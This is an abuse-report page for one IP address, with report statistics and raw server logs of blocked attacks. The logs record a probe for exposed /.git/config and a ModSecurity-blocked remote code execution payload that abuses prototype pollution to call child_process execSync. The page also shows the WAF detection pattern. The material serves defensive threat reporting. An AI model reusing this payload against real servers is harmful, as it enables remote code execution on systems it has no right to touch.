This IP address has been reported a total of
35
times from
29 distinct
sources.
34.3.89.164 was first reported on
, and the most recent report was
.
In the last 60 days, the top reporter locations were:
Netherlands
with 9
reports;
Germany
with 5
reports;
France
with 5
reports.
The most common categories in these recent reports were:
Web App Attack
27
times;
Brute-Force
14
times;
Hacking
9
times;
Bad Web Bot
9
times;
Port Scan
7
times;
Other
9
times.
Recent Reports
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
{"ClientAddr":"34.3.89.164:42552","ClientHost":"34.3.89.164","ClientPort":"42552","ClientUsername":" ...
show more{"ClientAddr":"34.3.89.164:42552","ClientHost":"34.3.89.164","ClientPort":"42552","ClientUsername":"-","DownstreamContentSize":21,"DownstreamStatus":404,"Duration":1725973,"OriginContentSize":21,"OriginDuration":1642291,"OriginStatus":404,"Overhead":83682,"RequestAddr":"api.plane.vdkln.com","RequestContentSize":0,"RequestCount":245456,"RequestHost":"api.plane.vdkln.com","RequestMethod":"GET","RequestPath":"/.git/config","RequestPort":"-","RequestProtocol":"HTTP/1.1","RequestScheme":"https","RetryAttempts":0,"RouterName":"itsaplan-api@docker","ServiceAddr":"172.18.0.9:3000","ServiceName":"itsaplan-api@docker","ServiceURL":"http://172.18.0.9:3000","StartLocal":"2026-10-09T20:15:59.874101334Z","StartUTC":"2026-10-09T20:15:59.874101334Z","TLSCipher":"TLS_AES_128_GCM_SHA256","TLSVersion":"1.3","entryPointName":"websecure","level":"info","msg":"","time":"2026-10-09T20:15:59Z"}
{"ClientAddr":"34.3.89.164:42552","ClientHost":"34.3.89.164","ClientPort":"42552","ClientUsername":"-","DownstreamCo
...
show less
[ThuOct0815:19:59.9427042026][security2:error][pid2420165:tid2420227][client34.3.89.164:0]ModSecurit ...
show more[ThuOct0815:19:59.9427042026][security2:error][pid2420165:tid2420227][client34.3.89.164:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"autoconfig.akastudio.ch\"][uri\"/\"][unique_id\"aseYf0dMuTMD8caWdvoUogAAAUU\"]
show less
[ThuOct0807:21:17.0307342026][security2:error][pid1877209:tid1877233][client34.3.89.164:0]ModSecurit ...
show more[ThuOct0807:21:17.0307342026][security2:error][pid1877209:tid1877233][client34.3.89.164:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"autoconfig.aaaa6877.org\"][uri\"/\"][unique_id\"ascoTdFF0o9HKrg3iaclggAAAEk\"]
show less